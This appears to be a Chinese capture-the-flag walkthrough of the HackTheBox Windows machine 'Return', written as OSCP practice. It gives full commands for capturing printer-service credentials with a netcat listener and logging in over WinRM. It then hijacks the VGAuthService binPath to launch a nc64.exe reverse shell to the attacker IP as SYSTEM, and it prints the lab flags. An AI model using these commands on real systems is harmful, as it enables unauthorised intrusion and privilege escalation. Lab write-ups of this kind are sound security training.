友情提醒
本文阅读时间推荐20min,靶场练习推荐3H
CCSK(云安全)(已通过认证)
ISO/IEC 27001 Foundation(已通过认证)
主要利用方式:
*服务回显获取用户密码,winrm连接获取flag
*sc绑定*服务二进制进程,重启服务回连获取root
靶场: hackthebox.com
靶机名称: Return
难度: window.Easy
发布时间: 27 Sep 2021
下载地址:https://app.hackthebox.com/machines/Return
备注:window主机,有N多值得学习的地方
攻击IP:10.10.16.2
靶机IP:10.10.11.108
1、探测靶机ip地址
└─$ sudo nmap -n -v -sC -sV -Pn 10.10.11.108 -oN return_nmap.txt
2、探测445端口smb的信息
看起来是一个window的主机,并且还有很多域控相关的端口
3、访问80端口
http://10.10.11.108/
在setting中发现了一个类似打印机服务地址,攻击机nc监听,将服务地址改为攻击机IP,并点击update
成功获取了一组用户名和密码
Username:svc-printer/password: 1edFg43012!! |
4、带着账号密码尝试smb及winrm
smb:
└─$ crackmapexec smb 10.10.11.108 --shares -u svc-printer -p '1edFg43012!!'
winrm:
└─$ crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
5、使用winrm连接主机
└─$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
探测信息:
6、切换目标,获取边界flag
*Evil-WinRM* PS C:Userssvc-printerDocuments> cd ..
cd *Evil-WinRM* PS C:Userssvc-printer> cd Desktop
typ*Evil-WinRM* PS C:Userssvc-printerDesktop> type user.txt
0968d198bad0fd305cfae6b4b6a0fa1a
7、查看若干本账号的权限
查看本用户特权:暂无特权可用
*Evil-WinRM* PS C:Userssvc-printerDesktop> whoami /priv
Groups组
*Evil-WinRM* PS C:Userssvc-printerDesktop> whoami /groups
Net user
*Evil-WinRM* PS C:Userssvc-printerDesktop> net user svc-printer
列出安装服务
*Evil-WinRM* PS C:Users> services
8、上传nc64.exe文件,进行相关利用
上传nc64.exe文件
*Evil-WinRM* PS C:Users> upload /home/kali/Desktop/nc64.exe
Info: Uploading /home/kali/Desktop/nc64.exe to C:Usersnc64.exe
Svc-printer用户上传的文件都在documents目录中
挑选一个有特权的服务(如:VGAuthService)修改它的二进制路径
*Evil-WinRM* PS C:Userssvc-printerDocuments> sc.exe config VGAuthService binPath="C:Userssvc-printerDocumentsnc64.exe -e cmd.exe 10.10.16.2 443"
攻击机nc开启监听
重启VGAuthService服务,但在有限的时间内,服务会挂掉
sc.exe stop VGAuthService
sc.exe start VGAuthService
9、nc回连,获取root.txt
C:Windowssystem32>cd C:UsersAdministratorDesktop
C:UsersAdministratorDesktop>type root.txt
type root.txt
0fb6faec51fb9b96d61618aa1334514d
10、Better Reverse Shell
当服务无法以服务方式启动时(对服务二进制文件有特定的要求),它会终止正在运行的进程。如果我的服务二进制文件实际上是nc.exe,并启动nc64.exe,那么即使nc.exe被杀死,nc64.exe也会继续运行:
sc.exe config VGAuthService binpath="C:windowssystem32cmd.exe /c C:Userssvc-printerDocumentsnc64.exe -e cmd 10.10.16.2 443"
本期靶场到此结束咯,欢迎添加好友进VX交流群
原文始发于微信公众号(从放弃到入门):【OSCP-HTB.01】 Return靶机渗透测试练习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论